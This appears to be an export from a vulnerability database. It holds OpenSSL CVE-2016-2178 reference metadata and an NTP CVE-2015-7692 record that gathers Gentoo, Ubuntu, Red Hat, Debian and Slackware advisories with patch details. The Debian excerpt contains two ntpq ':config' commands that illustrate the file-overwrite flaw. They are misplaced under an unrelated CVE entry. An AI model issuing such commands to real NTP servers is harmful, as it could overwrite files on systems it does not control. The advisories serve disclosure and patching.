"https://nvd.nist.gov/vuln/detail/cve-2016-0705" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-3185" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-3194" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1833" }, { "trust": 0.1, "url": "https://access.redhat.com/jbossnetwork/restricted/listsoftware.html?product=core.service.apachehttp\u0026downloadtype=distributions\u0026version=2.4.23" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2105" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8176" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1840" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1836" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1762" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1835" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-4449" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-0286" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1762" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-5420" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3194" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2108" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0286" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-3627" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2012-1148" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1837" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-2109" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-1834" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-3195" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0209" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1837" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1839" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-5419" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-4459" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-0209" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-3195" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0702" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2015-3216" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1838" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1833" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1834" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-4447" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-7141" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2016-0799" } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-2178" }, { "db": "BID", "id": "91081" }, { "db": "JVNDB", "id": "JVNDB-2016-003305" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "143176" }, { "db": "PACKETSTORM", "id": "138889" }, { "db": "PACKETSTORM", "id": "140056" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "143181" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "140182" }, { "db": "NVD", "id": "CVE-2016-2178" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULMON", "id": "CVE-2016-2178" }, { "db": "BID", "id": "91081" }, { "db": "JVNDB", "id": "JVNDB-2016-003305" }, { "db": "PACKETSTORM", "id": "138870" }, { "db": "PACKETSTORM", "id": "143176" }, { "db": "PACKETSTORM", "id": "138889" }, { "db": "PACKETSTORM", "id": "140056" }, { "db": "PACKETSTORM", "id": "138820" }, { "db": "PACKETSTORM", "id": "143181" }, { "db": "PACKETSTORM", "id": "138826" }, { "db": "PACKETSTORM", "id": "140182" }, { "db": "NVD", "id": "CVE-2016-2178" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-06-20T00:00:00", "db": "VULMON", "id": "CVE-2016-2178" }, { "date": "2016-06-08T00:00:00", "db": "BID", "id": "91081" }, { "date": "2016-06-22T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-003305" }, { "date": "2016-09-27T19:32:00", "db": "PACKETSTORM", "id": "138870" }, { "date": "2017-06-28T22:12:00", "db": "PACKETSTORM", "id": "143176" }, { "date": "2016-09-28T23:24:00", "db": "PACKETSTORM", "id": "138889" }, { "date": "2016-12-07T16:37:31", "db": "PACKETSTORM", "id": "140056" }, { "date": "2016-09-22T22:25:00", "db": "PACKETSTORM", "id": "138820" }, { "date": "2017-06-28T22:37:00", "db": "PACKETSTORM", "id": "143181" }, { "date": "2016-09-23T19:19:00", "db": "PACKETSTORM", "id": "138826" }, { "date": "2016-12-16T16:34:49", "db": "PACKETSTORM", "id": "140182" }, { "date": "2016-06-20T01:59:03.023000", "db": "NVD", "id": "CVE-2016-2178" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2023-11-07T00:00:00", "db": "VULMON", "id": "CVE-2016-2178" }, { "date": "2018-02-05T14:00:00", "db": "BID", "id": "91081" }, { "date": "2017-10-03T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-003305" }, { "date": "2023-11-07T02:31:01.430000", "db": "NVD", "id": "CVE-2016-2178" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "local", "sources": [ { "db": "BID", "id": "91081" } ], "trust": 0.3 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "OpenSSL of crypto/dsa/dsa_ossl.c of dsa_sign_setup In function DSA Vulnerability to obtain a private key", "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-003305" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Design Error", "sources": [ { "db": "BID", "id": "91081" } ], "trust": 0.3 } }
var-201708-0212
Vulnerability from variot
The crypto_xmit function in ntpd in NTP 4.2.x before 4.2.8p4, and 4.3.x before 4.3.77 allows remote attackers to cause a denial of service (crash). NOTE: This vulnerability exists due to an incomplete fix for CVE-2014-9750. NTP Contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. NTP is prone to a denial-of-service vulnerability. A remote attacker may exploit this issue to cause a denial-of-service condition, denying service to legitimate users. Due to the nature of this issue, code-injection may be possible; however this has not been confirmed. Versions prior to NTP 4.2.8p4 and 4.3.x prior to 4.3.77 are vulnerable. Note #2: This issue was previously titled 'NTP CVE-2015-7692 Denial of Service Vulnerability'. The title has been changed to better reflect the vulnerability information.
Gentoo Linux Security Advisory GLSA 201607-15
https://security.gentoo.org/
Severity: Normal Title: NTP: Multiple vulnerabilities Date: July 20, 2016 Bugs: #563774, #572452, #581528, #584954 ID: 201607-15
Synopsis
Multiple vulnerabilities have been found in NTP, the worst of which could lead to Denial of Service.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/ntp < 4.2.8_p8 >= 4.2.8_p8
Description
Multiple vulnerabilities have been discovered in NTP. Please review the CVE identifiers referenced below for details.
Workaround
There is no known workaround at this time.
Resolution
All NTP users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/ntp-4.2.8_p8"
References
[ 1 ] CVE-2015-7691 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7691 [ 2 ] CVE-2015-7692 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7692 [ 3 ] CVE-2015-7701 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7701 [ 4 ] CVE-2015-7702 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7702 [ 5 ] CVE-2015-7703 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7703 [ 6 ] CVE-2015-7704 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7704 [ 7 ] CVE-2015-7705 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7705 [ 8 ] CVE-2015-7848 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7848 [ 9 ] CVE-2015-7849 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7849 [ 10 ] CVE-2015-7850 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7850 [ 11 ] CVE-2015-7851 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7851 [ 12 ] CVE-2015-7852 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7852 [ 13 ] CVE-2015-7853 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7853 [ 14 ] CVE-2015-7854 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7854 [ 15 ] CVE-2015-7855 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7855 [ 16 ] CVE-2015-7871 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7871 [ 17 ] CVE-2015-7973 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7973 [ 18 ] CVE-2015-7974 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7974 [ 19 ] CVE-2015-7975 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7975 [ 20 ] CVE-2015-7976 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7976 [ 21 ] CVE-2015-7977 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7977 [ 22 ] CVE-2015-7978 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7978 [ 23 ] CVE-2015-7979 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7979 [ 24 ] CVE-2015-8138 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8138 [ 25 ] CVE-2015-8139 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8139 [ 26 ] CVE-2015-8140 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8140 [ 27 ] CVE-2015-8158 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-8158 [ 28 ] CVE-2016-1547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1547 [ 29 ] CVE-2016-1548 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1548 [ 30 ] CVE-2016-1549 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1549 [ 31 ] CVE-2016-1550 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1550 [ 32 ] CVE-2016-1551 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-1551 [ 33 ] CVE-2016-2516 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2516 [ 34 ] CVE-2016-2517 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2517 [ 35 ] CVE-2016-2518 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2518 [ 36 ] CVE-2016-2519 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-2519 [ 37 ] CVE-2016-4953 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4953 [ 38 ] CVE-2016-4954 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4954 [ 39 ] CVE-2016-4955 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4955 [ 40 ] CVE-2016-4956 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4956 [ 41 ] CVE-2016-4957 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2016-4957
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201607-15
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. ============================================================================ Ubuntu Security Notice USN-2783-1 October 27, 2015
ntp vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 15.10
- Ubuntu 15.04
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in NTP. (CVE-2015-5146)
Miroslav Lichvar discovered that NTP incorrectly handled logconfig directives. (CVE-2015-5194)
Miroslav Lichvar discovered that NTP incorrectly handled certain statistics types. (CVE-2015-5195)
Miroslav Lichvar discovered that NTP incorrectly handled certain file paths. (CVE-2015-5196, CVE-2015-7703)
Miroslav Lichvar discovered that NTP incorrectly handled certain packets. (CVE-2015-5219)
Aanchal Malhotra, Isaac E. Cohen, and Sharon Goldberg discovered that NTP incorrectly handled restarting after hitting a panic threshold. (CVE-2015-5300)
It was discovered that NTP incorrectly handled autokey data packets. (CVE-2015-7701)
Aanchal Malhotra, Isaac E. Cohen, and Sharon Goldberg discovered that NTP incorrectly handled rate limiting. (CVE-2015-7704, CVE-2015-7705)
Yves Younan discovered that NTP incorrectly handled logfile and keyfile directives. (CVE-2015-7850)
Yves Younan and Aleksander Nikolich discovered that NTP incorrectly handled ascii conversion. (CVE-2015-7852)
Yves Younan discovered that NTP incorrectly handled reference clock memory. (CVE-2015-7853)
John D "Doug" Birdwell discovered that NTP incorrectly handled decoding certain bogus values. (CVE-2015-7871)
In the default installation, attackers would be isolated by the NTP AppArmor profile.
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 15.10: ntp 1:4.2.6.p5+dfsg-3ubuntu8.1
Ubuntu 15.04: ntp 1:4.2.6.p5+dfsg-3ubuntu6.2
Ubuntu 14.04 LTS: ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.04.5
Ubuntu 12.04 LTS: ntp 1:4.2.6.p3+dfsg-1ubuntu3.6
In general, a standard system update will make all the necessary changes. 6) - i386, noarch, x86_64
On October 21st, 2015, NTP.org released a security advisory detailing 13 issues regarding multiple DoS vulnerabilities, information disclosure vulnerabilities, and logic issues that may result in an attacker gaining the ability to modify an NTP server's advertised time.
Workarounds that mitigate one or more of the vulnerabilities may be available for certain products, please see the individual Cisco Bug IDs for details. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: ntp security and bug fix update Advisory ID: RHSA-2016:2583-02 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-2583.html Issue date: 2016-11-03 CVE Names: CVE-2015-5194 CVE-2015-5195 CVE-2015-5196 CVE-2015-5219 CVE-2015-7691 CVE-2015-7692 CVE-2015-7701 CVE-2015-7702 CVE-2015-7703 CVE-2015-7852 CVE-2015-7974 CVE-2015-7977 CVE-2015-7978 CVE-2015-7979 CVE-2015-8158 =====================================================================
- Summary:
An update for ntp is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - aarch64, noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64
- Description:
The Network Time Protocol (NTP) is used to synchronize a computer's time with another referenced time source. These packages include the ntpd service which continuously adjusts system time and utilities used to query and configure the ntpd service.
Security Fix(es):
-
It was found that the fix for CVE-2014-9750 was incomplete: three issues were found in the value length checks in NTP's ntp_crypto.c, where a packet with particular autokey operations that contained malicious data was not always being completely validated. (CVE-2015-7691, CVE-2015-7692, CVE-2015-7702)
-
A memory leak flaw was found in ntpd's CRYPTO_ASSOC. If ntpd was configured to use autokey authentication, an attacker could send packets to ntpd that would, after several days of ongoing attack, cause it to run out of memory. (CVE-2015-7701)
-
An off-by-one flaw, leading to a buffer overflow, was found in cookedprint functionality of ntpq. (CVE-2015-7852)
-
A NULL pointer dereference flaw was found in the way ntpd processed 'ntpdc reslist' commands that queried restriction lists with a large amount of entries. (CVE-2015-7977)
-
A stack-based buffer overflow flaw was found in the way ntpd processed 'ntpdc reslist' commands that queried restriction lists with a large amount of entries. (CVE-2015-7978)
-
It was found that when NTP was configured in broadcast mode, a remote attacker could broadcast packets with bad authentication to all clients. The clients, upon receiving the malformed packets, would break the association with the broadcast server, causing them to become out of sync over a longer period of time. (CVE-2015-7979)
-
It was found that ntpd could crash due to an uninitialized variable when processing malformed logconfig configuration commands. (CVE-2015-5194)
-
It was found that ntpd would exit with a segmentation fault when a statistics type that was not enabled during compilation (e.g. timingstats) was referenced by the statistics or filegen configuration command. (CVE-2015-5195)
-
It was found that NTP's :config command could be used to set the pidfile and driftfile paths without any restrictions. A remote attacker could use this flaw to overwrite a file on the file system with a file containing the pid of the ntpd process (immediately) or the current estimated drift of the system clock (in hourly intervals). (CVE-2015-5196, CVE-2015-7703)
-
It was discovered that the sntp utility could become unresponsive due to being caught in an infinite loop when processing a crafted NTP packet. (CVE-2015-5219)
-
A flaw was found in the way NTP verified trusted keys during symmetric key authentication. An authenticated client (A) could use this flaw to modify a packet sent between a server (B) and a client (C) using a key that is different from the one known to the client (A). (CVE-2015-7974)
-
A flaw was found in the way the ntpq client processed certain incoming packets in a loop in the getresponse() function. A remote attacker could potentially use this flaw to crash an ntpq client instance. (CVE-2015-8158)
The CVE-2015-5219 and CVE-2015-7703 issues were discovered by Miroslav LichvA!r (Red Hat).
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.3 Release Notes linked from the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
After installing this update, the ntpd daemon will restart automatically.
- Bugs fixed (https://bugzilla.redhat.com/):
1242553 - ntpd doesn't reset system leap status when disarming leap timer 1254542 - CVE-2015-5194 ntp: crash with crafted logconfig configuration command 1254544 - CVE-2015-5195 ntp: ntpd crash when processing config commands with statistics type 1254547 - CVE-2015-7703 ntp: config command can be used to set the pidfile and drift file paths 1255118 - CVE-2015-5219 ntp: infinite loop in sntp processing crafted packet 1274254 - CVE-2015-7691 CVE-2015-7692 CVE-2015-7702 ntp: incomplete checks in ntp_crypto.c 1274255 - CVE-2015-7701 ntp: slow memory leak in CRYPTO_ASSOC 1274261 - CVE-2015-7852 ntp: ntpq atoascii memory corruption vulnerability 1297471 - CVE-2015-7974 ntp: missing key check allows impersonation between authenticated peers (VU#357792) 1300269 - CVE-2015-7977 ntp: restriction list NULL pointer dereference 1300270 - CVE-2015-7978 ntp: stack exhaustion in recursive traversal of restriction list 1300271 - CVE-2015-7979 ntp: off-path denial of service on authenticated broadcast mode 1300273 - CVE-2015-8158 ntp: potential infinite loop in ntpq
- Package List:
Red Hat Enterprise Linux Client (v. 7):
Source: ntp-4.2.6p5-25.el7.src.rpm
x86_64: ntp-4.2.6p5-25.el7.x86_64.rpm ntp-debuginfo-4.2.6p5-25.el7.x86_64.rpm ntpdate-4.2.6p5-25.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
noarch: ntp-doc-4.2.6p5-25.el7.noarch.rpm ntp-perl-4.2.6p5-25.el7.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-25.el7.x86_64.rpm sntp-4.2.6p5-25.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: ntp-4.2.6p5-25.el7.src.rpm
x86_64: ntp-4.2.6p5-25.el7.x86_64.rpm ntp-debuginfo-4.2.6p5-25.el7.x86_64.rpm ntpdate-4.2.6p5-25.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
noarch: ntp-doc-4.2.6p5-25.el7.noarch.rpm ntp-perl-4.2.6p5-25.el7.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-25.el7.x86_64.rpm sntp-4.2.6p5-25.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: ntp-4.2.6p5-25.el7.src.rpm
aarch64: ntp-4.2.6p5-25.el7.aarch64.rpm ntp-debuginfo-4.2.6p5-25.el7.aarch64.rpm ntpdate-4.2.6p5-25.el7.aarch64.rpm
ppc64: ntp-4.2.6p5-25.el7.ppc64.rpm ntp-debuginfo-4.2.6p5-25.el7.ppc64.rpm ntpdate-4.2.6p5-25.el7.ppc64.rpm
ppc64le: ntp-4.2.6p5-25.el7.ppc64le.rpm ntp-debuginfo-4.2.6p5-25.el7.ppc64le.rpm ntpdate-4.2.6p5-25.el7.ppc64le.rpm
s390x: ntp-4.2.6p5-25.el7.s390x.rpm ntp-debuginfo-4.2.6p5-25.el7.s390x.rpm ntpdate-4.2.6p5-25.el7.s390x.rpm
x86_64: ntp-4.2.6p5-25.el7.x86_64.rpm ntp-debuginfo-4.2.6p5-25.el7.x86_64.rpm ntpdate-4.2.6p5-25.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
aarch64: ntp-debuginfo-4.2.6p5-25.el7.aarch64.rpm sntp-4.2.6p5-25.el7.aarch64.rpm
noarch: ntp-doc-4.2.6p5-25.el7.noarch.rpm ntp-perl-4.2.6p5-25.el7.noarch.rpm
ppc64: ntp-debuginfo-4.2.6p5-25.el7.ppc64.rpm sntp-4.2.6p5-25.el7.ppc64.rpm
ppc64le: ntp-debuginfo-4.2.6p5-25.el7.ppc64le.rpm sntp-4.2.6p5-25.el7.ppc64le.rpm
s390x: ntp-debuginfo-4.2.6p5-25.el7.s390x.rpm sntp-4.2.6p5-25.el7.s390x.rpm
x86_64: ntp-debuginfo-4.2.6p5-25.el7.x86_64.rpm sntp-4.2.6p5-25.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: ntp-4.2.6p5-25.el7.src.rpm
x86_64: ntp-4.2.6p5-25.el7.x86_64.rpm ntp-debuginfo-4.2.6p5-25.el7.x86_64.rpm ntpdate-4.2.6p5-25.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
noarch: ntp-doc-4.2.6p5-25.el7.noarch.rpm ntp-perl-4.2.6p5-25.el7.noarch.rpm
x86_64: ntp-debuginfo-4.2.6p5-25.el7.x86_64.rpm sntp-4.2.6p5-25.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2015-5194 https://access.redhat.com/security/cve/CVE-2015-5195 https://access.redhat.com/security/cve/CVE-2015-5196 https://access.redhat.com/security/cve/CVE-2015-5219 https://access.redhat.com/security/cve/CVE-2015-7691 https://access.redhat.com/security/cve/CVE-2015-7692 https://access.redhat.com/security/cve/CVE-2015-7701 https://access.redhat.com/security/cve/CVE-2015-7702 https://access.redhat.com/security/cve/CVE-2015-7703 https://access.redhat.com/security/cve/CVE-2015-7852 https://access.redhat.com/security/cve/CVE-2015-7974 https://access.redhat.com/security/cve/CVE-2015-7977 https://access.redhat.com/security/cve/CVE-2015-7978 https://access.redhat.com/security/cve/CVE-2015-7979 https://access.redhat.com/security/cve/CVE-2015-8158 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/documentation/en-US/Red_Hat_Enterprise_Linux/7/html/7.3_Release_Notes/index.html
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2016 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFYGvvBXlSAg2UNWIIRAhRGAJ44LtHkhexE/w50LEGifKeLUMXYkwCgmm/0 XqilrenZq9cyvtnH8eGxdCw= =XqfK -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce .
CVE-2015-5300
It was found that ntpd did not correctly implement the -g option:
Normally, ntpd exits with a message to the system log if the offset
exceeds the panic threshold, which is 1000 s by default. This
option allows the time to be set to any value without restriction;
however, this can happen only once. If the threshold is exceeded
after that, ntpd will exit with a message to the system log. This
option can be used with the -q and -x options.
ntpd could actually step the clock multiple times by more than the
panic threshold if its clock discipline doesn't have enough time to
reach the sync state and stay there for at least one update. If a
man-in-the-middle attacker can control the NTP traffic since ntpd
was started (or maybe up to 15-30 minutes after that), they can
prevent the client from reaching the sync state and force it to step
its clock by any amount any number of times, which can be used by
attackers to expire certificates, etc.
This is contrary to what the documentation says. Normally, the
assumption is that an MITM attacker can step the clock more than the
panic threshold only once when ntpd starts and to make a larger
adjustment the attacker has to divide it into multiple smaller
steps, each taking 15 minutes, which is slow. For example:
ntpq -c ':config pidfile /tmp/ntp.pid'
ntpq -c ':config driftfile /tmp/ntp.drift'
In Debian ntpd is configured to drop root privileges, which limits
the impact of this issue.
CVE-2015-7704
If ntpd as an NTP client receives a Kiss-of-Death (KoD) packet
from the server to reduce its polling rate, it doesn't check if the
originate timestamp in the reply matches the transmit timestamp from
its request. An off-path attacker can send a crafted KoD packet to
the client, which will increase the client's polling interval to a
large value and effectively disable synchronization with the server.
CVE-2015-7850
An exploitable denial of service vulnerability exists in the remote
configuration functionality of the Network Time Protocol. A
specially crafted configuration file could cause an endless loop
resulting in a denial of service. An attacker could provide a the
malicious configuration file to trigger this vulnerability.
CVE-2015-7855
It was found that NTP's decodenetnum() would abort with an assertion
failure when processing a mode 6 or mode 7 packet containing an
unusually long data value where a network address was expected.
CVE-2015-7871
An error handling logic error exists within ntpd that manifests due
to improper error condition handling associated with certain
crypto-NAK packets. An unauthenticated, off-path attacker can force
ntpd processes on targeted servers to peer with time sources of the
attacker's choosing by transmitting symmetric active crypto-NAK
packets to ntpd. This attack bypasses the authentication typically
required to establish a peer association and allows an attacker to
make arbitrary changes to system time.
For the oldstable distribution (wheezy), these problems have been fixed in version 1:4.2.6.p5+dfsg-2+deb7u6.
For the stable distribution (jessie), these problems have been fixed in version 1:4.2.6.p5+dfsg-7+deb8u1.
For the testing distribution (stretch), these problems have been fixed in version 1:4.2.8p4+dfsg-3.
For the unstable distribution (sid), these problems have been fixed in version 1:4.2.8p4+dfsg-3.
We recommend that you upgrade your ntp packages.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/ntp-4.2.8p4-i486-1_slack14.1.txz: Upgraded. In addition to bug fixes and enhancements, this release fixes several low and medium severity vulnerabilities. For more information, see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9750 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5196 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7691 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7692 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7701 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7702 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7704 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7705 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7848 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7849 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7850 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7851 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7852 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7853 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7854 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7855 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7871 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 13.0: ftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p4-i486-1_slack13.0.txz
Updated package for Slackware x86_64 13.0: ftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p4-x86_64-1_slack13.0.txz
Updated package for Slackware 13.1: ftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p4-i486-1_slack13.1.txz
